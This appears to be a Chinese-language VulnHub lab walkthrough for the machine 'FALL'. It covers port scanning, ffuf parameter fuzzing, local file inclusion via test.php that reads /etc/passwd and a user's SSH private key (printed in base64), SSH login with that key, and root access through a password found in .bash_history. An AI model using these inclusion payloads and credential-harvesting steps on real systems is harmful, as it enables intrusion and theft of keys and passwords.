vulnhub靶场之DIGITALWORLD.LOCAL: FALL

准备：

攻击机：虚拟机kali、本机win10。

靶机：digitalworld.local: FALL，下载地址：https://download.vulnhub.com/digitalworld/FALL.7z，下载后直接vbox打开即可。

知识点：ffuf参数爆破、文件包含、ssh私匙登录、历史命令泄露敏感信息。

信息收集：

扫描下端口对应的服务：nmap -T4 -sV -A 192.168.110.110，显示开放了22、80、139、9090端口，开启了ssh、http、samba服务。

访问下web服务，发现一个疑是账户名：qiu，以及提示信息告诉我们存在测试脚本污染，那就进行下目录扫描。

目录扫描：

使用dirmap进行目录扫描，发现了test.php、robots.txt等文件。访问robots.txt文件未发现有用信息。访问test.php文件显示缺少参数。

ffuf参数爆破：

使用ffuf进行参数爆破，命令：ffuf -u 'http://192.168.110.110/test.php?FUZZ=../../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 80，成功获得参数名称：file。最后的-fs是为了过滤下无用的返回信息，需要根据具体情况进行调整，这里使用-fs 80就可以。

访问下该文件：../../../../../../../etc/passwd，命令：http://192.168.110.110/test.php?file=../../../../../../../etc/passwd，证实账户：qiu的存在。

获取shell：

利用此文件包含漏洞读取下其私匙信息，命令：http://192.168.110.110/test.php?file=php://filter/read=convert.base64-encode/resource=/home/qiu/.ssh/id_rsa，这里我使用的是base64加密，未使用的时候读取时格式不太对，因此使用base64读取在进行解码。

id_rsa_base64

LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJGd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFRRUF2TmpoT0ZPU2VESHk5SzV2bkhTczNxVGpXTmVoQVB6VDBzRDNiZUJQVnZZS1FKdDBBa0QwCkZEY1dUU1NGMTNOaGJqQ1FtNWZuelI4dGQ0c2pKTVlpQWwrdkFLYm9IbmUwbmpHa0J3ZHk1UGdtY1h5ZVpURUNJR2tnZ1gKNjFrSW1VT0lxdExNY2pGNXRpKzA5UkdpV2VTbWZJRHRUQ2pqLyt1UWxva1VNdGRjNE5PdjRYR0picDdHZEVXQlpldmllbgpxWG9YdEc2ajdnVWd0WFgxRnhseDNGUGh4RTNseHcvQWZaOWliMjFKR2xPeXk4Y2ZsVGxvZ3JaUG9JQ0NYSVYva3hHSzBkClp1Y3c4ckdHTWM2SnY3bnBlUVMxSVhVOVZuUDNMV2xPR0ZVMGorSVM1U2lOa3NSZmRRNG1DTjlTWWhBbTltQUtjWlc4d1MKdlh1RGpXT0xFd0FBQTlBUzV0Um1FdWJVWmdBQUFBZHpjMmd0Y25OaEFBQUJBUUM4Mk9FNFU1SjRNZkwwcm0rY2RLemVwTwpOWTE2RUEvTlBTd1BkdDRFOVc5Z3BBbTNRQ1FQUVVOeFpOSklYWGMyRnVNSkNibCtmTkh5MTNpeU1reGlJQ1g2OEFwdWdlCmQ3U2VNYVFIQjNMaytDWnhmSjVsTVFJZ2FTQ0JmcldRaVpRNGlxMHN4eU1YbTJMN1QxRWFKWjVLWjhnTzFNS09QLzY1Q1cKaVJReTExemcwNi9oY1lsdW5zWjBSWUZsNitKNmVwZWhlMGJxUHVCU0MxZGZVWEdYSGNVK0hFVGVYSEQ4QjluMkp2YlVrYQpVN0xMeHgrVk9XaUN0aytnZ0lKY2hYK1RFWXJSMW01ekR5c1lZeHpvbS91ZWw1QkxVaGRUMVdjL2N0YVU0WVZUU1A0aExsCktJMlN4RjkxRGlZSTMxSmlFQ2IyWUFweGxiekJLOWU0T05ZNHNUQUFBQUF3RUFBUUFBQVFBclhJRWFOZFpEMHZRK1NtOUcKTldRY0d6QTRqZ3BoOTZ1TGtOTS9YMm5ZUmRaRXoyenJ0NDVUdGZKZzlDbm5ObzhBaGhZdUk4c054a0xpV0FoUndVeTl6cwpxWUU3cm9oQVBzN3VrQzFDc0ZlQlVicWNtVTRwUGliVUVSZXM2bHlYRkhLbEJwSDdCbkV6Ni9CWTlSdWFHRzVCMkRpa2JCCjh0L0NETzc5cTdjY2ZUWnMrZ09WUlg0UFc2NDErY1p4bzUvZ0wzR2NkSndEWTRnZ1B3YlUvbThzWXN5TjFOV0o4TkgwMGQKWDhUSGFRQUVYQU82VFR6UE1MZ3dKaSswa2oxVVRnK0Qrbk9OZmg3eGVYTHNlU1QwbTFwK2U5Qy84cnNlWnNTSlN4b1hLawpDbUR5NjlhTW9kY3BXK1pYbDlOY2pFd3JNdkpQTExLamhJVWNJaE5qZjRBQkFBQUFnRXIzWktVdUpxdUJORlBoRVVnVWljCml2SG9aSDZVODJWeUVZMkJ6MjRxZXZjVnoySWNBWExCTElwK2Yxb2l3WVVWTUl1V1FEdzZMU29uOFM3MmtrN1ZXaURyV3oKbEhqUmZwVXdXZHpkV1NNWTZQSTdFcEdWVnMwcW1SQy9UVHFPSUgrRlhBNjZjRngzWDR1T0Nqa3pUMC9FczB1TnlaMDdxUQo1OGNHRThjS3JMQUFBQWdRRGxQYWpEUlZmRFdnT1dKaitpbVhmcEdzbW84MVVEYVlYd2tsenc0Vk0yU2ZJSElBRlpQYUEwCmFjbTQvaWNLR1BsbllXc3ZaQ2tzdmxVY2srdGkrSjJSUzJNcTlqbUtCMEFWWmlzRmF6ajhxSWRlM1NQUHd0UjdnQlIzMjkKSlczRGIrS0lTTVJJdmRwSnYrZWlLUUxnL2VwYlNkd1haaTBESm9CMGExNUZzSUFRQUFBSUVBMHVRbDBkMHAzTnhDeVQvKwpRNk4rbGxmOVRCNStWTmppbmFHdTREWTZxVnJTSG1oa2NlSHRYeEc2aDl1cFJ0S3c1QnZPbFNiVGF0bGZNWllVdGxaMW1MClJXQ1U4RDd2MVFuN3FNZmx4NGJsZFlnVjhsZjE4c2I2Zy91enRXSnVMcEZlM1VlL01MZ2VKKzJUaUF3OXlZb1BWeVNOSzgKdWhTSGEwZHZ2ZW9KOHhNQUFBQVpjV2wxUUd4dlkyRnNhRzl6ZEM1c2IyTmhiR1J2YldGcGJnRUMKLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==

在kali上将base64解码后的数据写入到id_rsa文件并赋予600权限。然后使用id_rsa进行登录，命令：ssh qiu@192.168.110.110 -i id_rsa，成功获得shell权限。

在当前目录下发现local.txt文件，读取该文件获取到flag值。

提权：

查看下当前账户是否存在可以使用的特权命令，sudo -l，但是需要密码才可以。

查看当前用户下具有root权限的可执行文件都有哪些，命令：find / -perm -4000 -type f 2>/dev/null，发现了/usr/lib/polkit-1/polkit-agent-helper-1，但是相关的两个漏洞经测试均失败。

后来在当前目录下发现.bash_history文件，读取该文件时发现一串字符：remarkablyawesomE，疑是密码。

使用获得的字符串进行尝试切换root账户，成功切换到root账户并在/rrot目录下发现proof.txt文件，读取该文件，成功获取到flag值。